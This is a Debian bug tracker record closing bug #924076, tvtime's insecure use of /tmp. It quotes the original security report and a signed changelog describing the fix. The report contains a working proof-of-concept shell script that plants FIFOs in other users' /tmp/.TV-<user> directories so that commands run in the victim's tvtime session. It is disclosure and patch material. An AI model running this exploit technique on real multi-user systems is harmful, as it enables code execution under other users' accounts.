Bug#924076: marked as done (tvtime: insecure use of /tmp)

["Debian Bug Tracking System" <owner@bugs.debian.org>]

Your message dated Fri, 05 Apr 2019 18:48:54 +0000
with message-id <E1hCTtW-000HvD-Vy@fasolo.debian.org>
and subject line Bug#924076: fixed in tvtime 1.0.11-5
has caused the Debian Bug report #924076,
regarding tvtime: insecure use of /tmp
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact owner@bugs.debian.org
immediately.)


-- 
924076: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=924076
Debian Bug Tracking System
Contact owner@bugs.debian.org with problems

--- Begin Message ---

• To: submit@bugs.debian.org
• Subject: tvtime: insecure use of /tmp
• From: Jakub Wilk <jwilk@jwilk.net>
• Date: Sat, 9 Mar 2019 12:25:07 +0100
• Message-id: <20190309112507.lnvo25wwd24uxwqu@jwilk.net>

Package: tvtime
Version: 1.0.11-4
Severity: grave
Tags: security

tvtime uses /tmp/.TV-<username>/ as a temporary directory, even when it belongs to another (potentially malicious) user. Local attacker can exploit this bug to execute arbitrary code in the context of a tvtime user.

I've attached a proof-of-concept exploit.

--
Jakub Wilk

#!/bin/sh
set -e -u
if ! command -v xeyes > /dev/null
then
    printf 'xeyes(1) not found. Please install x11-apps.\n' >&2
    exit 1
fi
cd /tmp
basedir=$(mktemp -d tvtime-exploit.XXXXXX)
chmod 755 "$basedir"
mkfifo -m 644 "$basedir/cmd"
mkfifo -m 666 "$basedir/ratelim"
hostname=$(hostname)
users=$(getent passwd | cut -d: -f1)
for user in $users
do
    userdir=".TV-$user"
    rm -rf "$userdir" || true  # maybe stale dir from the previous exploit run?
    if ! mkdir -m 755 "$userdir"
    then
        printf 'Failed to mount the exploit against %s; Maybe try again after reboot?\n' "$user"
        continue
    fi
    ln "$basedir/cmd" "$userdir/tvtimefifo-$hostname"
done
while true
do
    printf 'Waiting for the victim to run tvtime...' "$0" >&2
    printf 'RUN_COMMAND xeyes && echo x > /tmp/%s; true\n' "$basedir/ratelim" > "$basedir/cmd"
    printf '\n' >&2
    read x < "$basedir/ratelim"
done

--- End Message ---

--- Begin Message ---

• To: 924076-close@bugs.debian.org
• Subject: Bug#924076: fixed in tvtime 1.0.11-5
• From: Tobias Frost <tobi@debian.org>
• Date: Fri, 05 Apr 2019 18:48:54 +0000
• Message-id: <E1hCTtW-000HvD-Vy@fasolo.debian.org>

Source: tvtime
Source-Version: 1.0.11-5

We believe that the bug you reported is fixed in the latest version of
tvtime, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 924076@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Tobias Frost <tobi@debian.org> (supplier of updated tvtime package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Format: 1.8
Date: Fri, 05 Apr 2019 20:27:01 +0200
Source: tvtime
Architecture: source
Version: 1.0.11-5
Distribution: unstable
Urgency: medium
Maintainer: Debian QA Group <packages@qa.debian.org>
Changed-By: Tobias Frost <tobi@debian.org>
Closes: 924076
Changes:
 tvtime (1.0.11-5) unstable; urgency=medium
 .
   * QA upload.
   * Create repository on salsa.
   * Refresh patches
   * Fix "insecure use of /tmp" by only using the fall back to $HOME.
     This is patch 0002-disable-insecure-temp-file.patch
     (Closes: #924076)
Checksums-Sha1:
 40180436dcfd99044e9e6c164be1a20ae02acc99 2040 tvtime_1.0.11-5.dsc
 79e075865f7b39ba644910858d3ee2dff81687bb 40124 tvtime_1.0.11-5.debian.tar.xz
 fbe846051c552c186fb2dde0363ebe9be91db3a4 8304 tvtime_1.0.11-5_source.buildinfo
Checksums-Sha256:
 f57131a0f39f82263c6fb202251395a3e6a1e63156c3dd55e8e8a832f0085731 2040 tvtime_1.0.11-5.dsc
 40db0a5383112d658d10d1de1e924a604bdad1815e24fde3d3d0e6cb18f663dd 40124 tvtime_1.0.11-5.debian.tar.xz
 40e74103c54c04599524e246e5e56a4857c5ac5e8776f4ecd57e810a50d49a3c 8304 tvtime_1.0.11-5_source.buildinfo
Files:
 81943ab3cde05fc3f079b102a4ddb739 2040 video optional tvtime_1.0.11-5.dsc
 308255039bd830f4294cc14a4289a0a5 40124 video optional tvtime_1.0.11-5.debian.tar.xz
 c53005d21d2c9acf5647297fe1f62f16 8304 video optional tvtime_1.0.11-5_source.buildinfo

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEE/d0M/zhkJ3YwohhskWT6HRe9XTYFAlynnoYACgkQkWT6HRe9
XTaiVRAAiIehS5iuw7Bm3Cn6s0WL29NrfP/BFDOaWfTkdcIDK6+POq6AyP91VaZy
0ll36UP6NXaIsc8z/FM7aW+X/wI3znWd6hrGBSRj4cdghDH8+fWpe1DuOT+Pi3b1
38NAo7mVOnMRlqvJWWPKmIhCsC9dWBe1zd3CEWxLtrPHXXwKIugc6a9htfor+X97
/n1QR7FJ0LJeSpDBC5x5ig4T71jYnDFsbgOdLKWyXlA3kHd6SMHs5Qbq2x5B4lZ+
B1+ukNDVbI+pxoPf0eMYe73dPi18l0eoT+LljMLgT7CpjsnUC/3bghni1IR0j2JZ
gS5Op5LZDx4ateLVcXOt1Q+2So7v4OgKP9zUErA3h32O1MgnloCZeO8QI3st91IA
rQJkaSwbuugX+WvFvlnWvjefKaVe8vm6srcBwwnc6I1MPs4zarjr7xmRYcuZMeXk
BRzUYQJH63+Kv8fB9vfuojvjgT08ZQ2Q5BsDJ8yD819AL78uNOcTLqRaUByBKwQa
+Oz6t2WowbbcEt1z6PIkZDesQpLwz0nJs+l+aK1xlFpWiyynfqmFl+1n2DrelN5A
vOmYjekyOH8GQvqOYFffgVRkWefbbJxHPbR/aWwI70TQc1x90v0P9TrA3IxPnFJ+
JmH1o6z8Fgy6DyEIg/Bv794tR/z9z16eG1P1kgEUxj2OsUWHd4I=
=b9Tu
-----END PGP SIGNATURE-----

--- End Message ---